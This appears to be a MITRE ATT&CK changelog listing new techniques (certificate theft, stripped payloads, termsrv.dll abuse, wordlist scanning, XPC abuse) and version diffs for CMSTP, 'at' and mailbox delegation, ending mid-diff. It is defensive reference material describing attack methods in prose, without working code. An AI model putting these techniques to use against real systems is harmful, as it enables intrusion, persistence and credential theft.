Description: Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview) Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned) Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts. Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)


[T1027.008] Obfuscated Files or Information: Stripped Payloads

Current version: 1.0

Description: Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018) Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)


[T1505.005] Server Software Component: Terminal Services DLL

Current version: 1.0

Description: Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services) [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll.(Citation: Microsoft System Services Fundamentals) The termsrv.dll file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`. Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll file or modifying the ServiceDll value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.


[T1595.003] Active Scanning: Wordlist Scanning

Current version: 1.0

Description: Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)). As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally.


[T1559.003] Inter-Process Communication: XPC Services

Current version: 1.0

Description: Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev) Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

Major Version Changes

[T1098.002] Account Manipulation: Additional Email Delegate Permissions

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may grant additional permission levels, such as t1Adversaries may grant additional permission levels to mainta
>ReadPermission or FullAccess, to maintain persistent access >in persistent access to an adversary-controlled email accoun
>to an adversary-controlled email account. The <code>Add-Mail>t.   For example, the <code>Add-MailboxPermission</code> [Po
>boxPermission</code> [PowerShell](https://attack.mitre.org/t>werShell](https://attack.mitre.org/techniques/T1059/001) cmd
>echniques/T1059/001) cmdlet, available in on-premises Exchan>let, available in on-premises Exchange and in the cloud-base
>ge and in the cloud-based service Office 365, adds permissio>d service Office 365, adds permissions to a mailbox.(Citatio
>ns to a mailbox.(Citation: Microsoft - Add-MailboxPermission>n: Microsoft - Add-MailboxPermission)(Citation: FireEye APT3
>)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding>5 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In
> in Plain Sight 2018)  Adversaries may also assign mailbox f> Google Workspace, delegation can be enabled via the Google 
>older permissions through individual folder permissions or r>Admin console and users can delegate accounts via their Gmai
>oles. Adversaries may assign the Default or Anonymous user p>l settings.(Citation: Gmail Delegation)(Citation: Google Ens
>ermissions or roles to the Top of Information Store (root), >uring Your Information is Safe)   Adversaries may also assig
>Inbox, or other mailbox folders. By assigning one or both us>n mailbox folder permissions through individual folder permi
>er permissions to a folder, the adversary can utilize any ot>ssions or roles. In Office 365 environments, adversaries may
>her account in the tenant to maintain persistence to the tar> assign the Default or Anonymous user permissions or roles t
>get user’s mail folders.(Citation: Remediation and Hardening>o the Top of Information Store (root), Inbox, or other mailb
> Strategies for Microsoft 365 to Defend Against UNC2452)  Th>ox folders. By assigning one or both user permissions to a f
>is may be used in persistent threat incidents as well as BEC>older, the adversary can utilize any other account in the te
> (Business Email Compromise) incidents where an adversary ca>nant to maintain persistence to the target user’s mail folde
>n assign more access rights to the accounts they wish to com>rs.(Citation: Remediation and Hardening Strategies for Micro
>promise. This may further enable use of additional technique>soft 365 to Defend Against UNC2452)  This may be used in per
>s for gaining access to systems. For example, compromised bu>sistent threat incidents as well as BEC (Business Email Comp
>siness accounts are often used to send messages to other acc>romise) incidents where an adversary can add [Additional Clo
>ounts in the network of the target business while creating i>ud Roles](https://attack.mitre.org/techniques/T1098/003) to 
>nbox rules (ex: [Internal Spearphishing](https://attack.mitr>the accounts they wish to compromise. This may further enabl
>e.org/techniques/T1534)), so the messages evade spam/phishin>e use of additional techniques for gaining access to systems
>g detection mechanisms.(Citation: Bienstock, D. - Defending >. For example, compromised business accounts are often used 
>O365 - 2019)>to send messages to other accounts in the network of the tar
 >get business while creating inbox rules (ex: [Internal Spear
 >phishing](https://attack.mitre.org/techniques/T1534)), so th
 >e messages evade spam/phishing detection mechanisms.(Citatio
 >n: Bienstock, D. - Defending O365 - 2019)

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 18:57:04.148000+00:002022-04-19 14:55:26.110000+00:00
nameExchange Email Delegate PermissionsAdditional Email Delegate Permissions
descriptionAdversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
external_references[1]['source_name']Microsoft - Add-MailboxPermissionBienstock, D. - Defending O365 - 2019
external_references[1]['description']Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.
external_references[1]['url']https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-pshttps://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365
external_references[2]['source_name']FireEye APT35 2018Crowdstrike Hiding in Plain Sight 2018
external_references[2]['description']Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020.
external_references[2]['url']https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdfhttps://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/
external_references[3]['source_name']Crowdstrike Hiding in Plain Sight 2018Google Ensuring Your Information is Safe
external_references[3]['description']Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020.Google. (2011, June 1). Ensuring your information is safe online. Retrieved April 1, 2022.
external_references[3]['url']https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html
external_references[4]['source_name']Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452Gmail Delegation
external_references[4]['description']Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.Google. (n.d.). Turn Gmail delegation on or off. Retrieved April 1, 2022.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.htmlhttps://support.google.com/a/answer/7223765?hl=en
external_references[5]['source_name']Bienstock, D. - Defending O365 - 2019FireEye APT35 2018
external_references[5]['description']Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.
external_references[5]['url']https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft - Add-MailboxPermission', 'description': 'Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.', 'url': 'https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps'}
external_references{'source_name': 'Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452', 'description': 'Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html'}
x_mitre_data_sourcesUser Account: User Account Modification
x_mitre_platformsGoogle Workspace
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesUser Account: User Account Modification

[T1053.002] Scheduled Task/Job: At

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may abuse the <code>at.exe</code> utility to pert1Adversaries may abuse the [at](https://attack.mitre.org/soft
>form task scheduling for initial or recurring execution of m>ware/S0110) utility to perform task scheduling for initial o
>alicious code. The [at](https://attack.mitre.org/software/S0>r recurring execution of malicious code. The [at](https://at
>110) utility exists as an executable within Windows for sche>tack.mitre.org/software/S0110) utility exists as an executab
>duling tasks at a specified time and date. Using [at](https:>le within Windows, Linux, and macOS for scheduling tasks at 
>//attack.mitre.org/software/S0110) requires that the Task Sc>a specified time and date. Although deprecated in favor of [
>heduler service be running, and the user to be logged on as >Scheduled Task](https://attack.mitre.org/techniques/T1053/00
>a member of the local Administrators group.   An adversary m>5)'s [schtasks](https://attack.mitre.org/software/S0111) in 
>ay use <code>at.exe</code> in Windows environments to execut>Windows environments, using [at](https://attack.mitre.org/so
>e programs at system startup or on a scheduled basis for per>ftware/S0110) requires that the Task Scheduler service be ru
>sistence. [at](https://attack.mitre.org/software/S0110) can >nning, and the user to be logged on as a member of the local
>also be abused to conduct remote Execution as part of Latera> Administrators group.  On Linux and macOS, [at](https://att
>l Movement and or to run a process under the context of a sp>ack.mitre.org/software/S0110) may be invoked by the superuse
>ecified account (such as SYSTEM).  Note: The <code>at.exe</c>r as well as any users added to the <code>at.allow</code> fi
>ode> command line utility has been deprecated in current ver>le. If the <code>at.allow</code> file does not exist, the <c
>sions of Windows in favor of <code>schtasks</code>.>ode>at.deny</code> file is checked. Every username not liste
 >d in <code>at.deny</code> is allowed to invoke [at](https://
 >attack.mitre.org/software/S0110). If the <code>at.deny</code
 >> exists and is empty, global use of [at](https://attack.mit
 >re.org/software/S0110) is permitted. If neither file exists 
 >(which is often the baseline) only the superuser is allowed 
 >to use [at](https://attack.mitre.org/software/S0110).(Citati
 >on: Linux at)  Adversaries may use [at](https://attack.mitre
 >.org/software/S0110) to execute programs at system startup o
 >r on a scheduled basis for [Persistence](https://attack.mitr
 >e.org/tactics/TA0003). [at](https://attack.mitre.org/softwar
 >e/S0110) can also be abused to conduct remote [Execution](ht
 >tps://attack.mitre.org/tactics/TA0002) as part of [Lateral M
 >ovement](https://attack.mitre.org/tactics/TA0008) and/or to 
 >run a process under the context of a specified account (such
 > as SYSTEM).  In Linux environments, adversaries may also ab
 >use [at](https://attack.mitre.org/software/S0110) to break o
 >ut of restricted environments by using a task to spawn an in
 >teractive system shell or to run system commands. Similarly,
 > [at](https://attack.mitre.org/software/S0110) may also be u
 >sed for [Privilege Escalation](https://attack.mitre.org/tact
 >ics/TA0004) if the binary is allowed to run as superuser via
 > <code>sudo</code>.(Citation: GTFObins at)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 13:43:40.776000+00:002022-04-18 20:12:04.110000+00:00
nameAt (Windows)At
descriptionAdversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. An adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). Note: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks.Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at) Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM). In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)
external_references[1]['source_name']Twitter Leoloobeek Scheduled Taskrowland linux at 2019
external_references[1]['description']Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.
external_references[1]['url']https://twitter.com/leoloobeek/status/939248813465853953https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/
external_references[2]['source_name']TechNet Forum Scheduled Task Operational SettingGTFObins at
external_references[2]['description']Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.
external_references[2]['url']https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8genhttps://gtfobins.github.io/gtfobins/at/
external_references[3]['source_name']TechNet Scheduled Task EventsLinux at
external_references[3]['description']Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022.
external_references[3]['url']https://technet.microsoft.com/library/dd315590.aspxhttps://man7.org/linux/man-pages/man1/at.1p.html
external_references[4]['source_name']Microsoft Scheduled Task Events Win10Twitter Leoloobeek Scheduled Task
external_references[4]['description']Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.
external_references[4]['url']https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-eventshttps://twitter.com/leoloobeek/status/939248813465853953
external_references[5]['source_name']TechNet AutorunsMicrosoft Scheduled Task Events Win10
external_references[5]['description']Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.
external_references[5]['url']https://technet.microsoft.com/en-us/sysinternals/bb963902https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[3]Process: Process CreationCommand: Command Execution
x_mitre_detectionMonitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. In Linux and macOS environments, monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. Review all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019) Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [Command and Control](https://attack.mitre.org/tactics/TA0011), learning details about the environment through [Discovery](https://attack.mitre.org/tactics/TA0007), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'TechNet Scheduled Task Events', 'description': 'Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.', 'url': 'https://technet.microsoft.com/library/dd315590.aspx'}
external_references{'source_name': 'TechNet Autoruns', 'description': 'Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', 'url': 'https://technet.microsoft.com/en-us/sysinternals/bb963902'}
external_references{'source_name': 'TechNet Forum Scheduled Task Operational Setting', 'description': 'Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.', 'url': 'https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen'}
x_mitre_permissions_requiredUser
x_mitre_platformsLinux
x_mitre_platformsmacOS

[T1218.003] System Binary Proxy Execution: CMSTP

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may abuse CMSTP to proxy execution of malicious t1Adversaries may abuse CMSTP to proxy execution of malicious 
>code. The Microsoft Connection Manager Profile Installer (CM>code. The Microsoft Connection Manager Profile Installer (CM
>STP.exe) is a command-line program used to install Connectio>STP.exe) is a command-line program used to install Connectio
>n Manager service profiles. (Citation: Microsoft Connection >n Manager service profiles. (Citation: Microsoft Connection 
>Manager Oct 2009) CMSTP.exe accepts an installation informat>Manager Oct 2009) CMSTP.exe accepts an installation informat
>ion file (INF) as a parameter and installs a service profile>ion file (INF) as a parameter and installs a service profile
> leveraged for remote access connections.  Adversaries may s> leveraged for remote access connections.  Adversaries may s
>upply CMSTP.exe with INF files infected with malicious comma>upply CMSTP.exe with INF files infected with malicious comma
>nds. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Re>nds. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Re
>gsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Sq>gsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Sq
>uiblydoo”, CMSTP.exe may be abused to load and execute DLLs >uiblydoo”, CMSTP.exe may be abused to load and execute DLLs 
>(Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (>(Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (
>SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018)>SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018)
> (Citation: GitHub Ultimate AppLocker Bypass List) (Citation> (Citation: GitHub Ultimate AppLocker Bypass List) (Citation
>: Endurant CMSTP July 2018) This execution may also bypass A>: Endurant CMSTP July 2018) This execution may also bypass A
>ppLocker and other application control defenses since CMSTP.>ppLocker and other application control defenses since CMSTP.
>exe is a legitimate, signed Microsoft application.  CMSTP.ex>exe is a legitimate binary that may be signed by Microsoft. 
>e can also be abused to [Bypass User Account Control](https:> CMSTP.exe can also be abused to [Bypass User Account Contro
>//attack.mitre.org/techniques/T1548/002) and execute arbitra>l](https://attack.mitre.org/techniques/T1548/002) and execut
